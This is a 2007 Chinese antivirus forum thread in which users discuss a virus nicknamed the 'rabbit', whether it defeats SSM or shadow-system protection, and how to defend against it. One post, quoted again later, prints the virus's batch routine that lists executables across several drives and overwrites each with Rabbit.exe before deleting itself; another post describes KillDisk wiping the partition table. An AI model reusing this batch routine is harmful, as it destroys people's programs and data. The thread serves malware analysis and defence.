瑞星卡卡安全论坛
小小饭长 - 2007-4-9 17:46:00
呵呵
★蓝色尘埃★ - 2007-4-9 21:27:00
谢谢
抽风超人 - 2007-4-9 21:50:00
卡饭中招了?我今天一天都登陆不上。。
飞逝v流星 - 2007-4-10 0:37:00
怎么老是有人在做病毒,不过也好,让大家对安全都有点意识
高歌猛进 - 2007-4-10 8:32:00
这贴子在别的地方出现了,没注明转贴,很是替猫版不平(不会是猫版自己转的吧)
spiritfire - 2007-4-10 9:10:00
加壳方式?
天月来了 - 2007-4-10 10:36:00
这个病毒现在的广为分析和讨论,为以后其他制毒者提供了更好的思路。
如果将熊猫到现在的流行的几个病毒的特点和兔兔合在一起。估计就差不多横扫网络了。
所有的用户,都没一个好下去场。
当然了,只有加了影子系统的,只上网玩的,才能幸免。
其他的要保存工作数据的,无法上影子系统的用户,就都得完蛋。
现在想,以后的主动防御,将成最主要的系统配置了。
但是还得不断推出新的主动防御软件。
现在的SSM已广为人知,它的主体文件大家都知道的清清楚楚。
我觉得SSM这类软件,在监控时,应该还是有漏洞的。
不知以后的病毒会怎样。
baohe - 2007-4-10 10:44:00
| 引用: |
【天月来了的贴子】这个病毒现在的广为分析和讨论,为以后其他制毒者提供了更好的思路。
如果将熊猫到现在的流行的几个病毒的特点和兔兔合在一起。估计就差不多横扫网络了。
所有的用户,都没一个好下去场。
当然了,只有加了影子系统的,只上网玩的,才能幸免。
其他的要保存工作数据的,无法上影子系统的用户,就都得完蛋。
现在想,以后的主动防御,将成最主要的系统配置了。
但是还得不断推出新的主动防御软件。
现在的SSM已广为人知,它的主体文件大家都知道的清清楚楚。
我觉得SSM这类软件,在监控时,应该还是有漏洞的。
不知以后的病毒会怎样。
……………… |
没人敢说“影子”不会被病毒突破。事实上,木马KillDisk即可突破影子。
做光盘系统备份,经常备份非系统分区的重要数据到光盘上————是比较保险的办法之一。
艾玛 - 2007-4-10 10:46:00
C:\WINDOWS\system32\LOVETZ.bat
C:\WINDOWS\system32\TZ.bat
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
del %0
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
http://hi.baidu.com/killvir/blog/item/4823a61e06bcb91e4034177d.htmlupdate 2007.04.10
天月来了 - 2007-4-10 10:57:00
木马KillDisk能突破影子,够狠的!!!!!
估计这玩意也是写入分区里某些东西,才能突破的吧。
如果它的机理也被利用,岂不是天下无敌了?
看来微软得开发,在系统状态下无法向分区和系统文件中注入任何玩意的新操作系统了。
最好的是微软牵头迫使所有的软件都是无需安装和注册的才行。
这样开发出的不可以写入任何信息或数据的系统,才能长寿点。
天月来了 - 2007-4-10 11:00:00
木马KillDisk能突破影子,
不知在只有一个区。只有C盘的系统中,没有任何其他盘的系统中,能否干了影子呢?
猫猫试过吗?
baohe - 2007-4-10 11:40:00
| 引用: |
【天月来了的贴子】木马KillDisk能突破影子,
不知在只有一个区。只有C盘的系统中,没有任何其他盘的系统中,能否干了影子呢?
猫猫试过吗?
……………… |
KillDisk并不留下任何木马文件。
运行后,调用系统模块,写引导扇区,破坏硬盘分区表。
下次开机,系统就死翘翘了。系统引导期间报错:Invalid Partition Table(分区表无效)。
baohe - 2007-4-10 11:43:00
| 引用: |
【艾玛的贴子】C:\WINDOWS\system32\LOVETZ.bat
C:\WINDOWS\system32\TZ.bat
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
del %0
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
update 2007.04.10
……………… |
这孩子,不知道什么叫“死”。
让他玩儿吧。
鑫森淼焱磊亖 - 2007-4-10 12:12:00
刚才用费尔V7的动态防御完全防住了、用微 点也完全防住了
sanjingshou - 2007-4-10 13:04:00
有微 点的下载地址吗?
我是来来 - 2007-4-10 13:11:00
关RISING吗?
kendy603 - 2007-4-10 14:22:00
NB,,,,
新版小欧 - 2007-4-10 14:29:00
汗~~~~
这小兔子,运行时咋出现了这个东东???
附件:
8345092007410142004.jpg
∥黑礼服。の - 2007-4-10 16:35:00
写的不错``
蕊芯怎么啦? - 2007-4-10 17:36:00
| 引用: |
【baohe的贴子】
禁止autorun.inf创建——————没多大意义。
这个病毒连瑞星的.exe都替换掉了。瑞星启动加载————————运行的就是病毒体。
……………… |
呵呵!搞笑啊!冷幽默!
看来还是得用我以前提过的硬件还原卡最有效!不过得配合管理制度的执行!
33887 - 2007-4-10 18:22:00
这病毒作者也太招摇了吧,造毒就造吧,还要弄个造毒宣言.愣要弄那么大动静.要么是法盲,或无知者无畏.不要等到进笼子里才后悔
好学的忆忆 - 2007-4-10 18:54:00
现在造毒的越来越嚣张了,汗 ,BS之,学习了``
sanjingshou - 2007-4-10 19:32:00
猫老大:我也要个样本。。
地址:dina77cn@yahoo.com.cn
万一中招,文件可以修复吗?
麻烦给个微 点下载地址,谢谢。。。
pigboy - 2007-4-10 20:51:00
受教
谢了显得见外了
永远支持
新版小欧 - 2007-4-10 20:56:00
猫叔,我现在关心的是,这回的更新,会不会像一些网友所说的:无视SSM?
现在不在公司,没能亲试,希望猫叔给回复.
baohe - 2007-4-10 20:58:00
| 引用: |
【新版小欧的贴子】猫叔,我现在关心的是,这回的更新,会不会像一些网友所说的:无视SSM?
现在不在公司,没能亲试,希望猫叔给回复.
……………… |
SSM会被这个兔仔子干掉的
新版小欧 - 2007-4-10 21:02:00
这~~~
不是太好的现象,
有何方法防防,手头上管的服务器不少,还请指点.
SMILEc - 2007-4-10 21:37:00
兔兔没那个熊猫好看勒
赫赫!
但还是希望病毒越来越少....
Dsyrock - 2007-4-10 22:15:00
居然能干掉SSM?幸好我还有EQ的FD
我爱207 - 2007-4-10 22:16:00
病毒太厉害了.连“杀毒软件”也遭荼毒,我们这些菜鸟只能认毒宰割了吗?无奈。
© 2000 - 2026 Rising Corp. Ltd.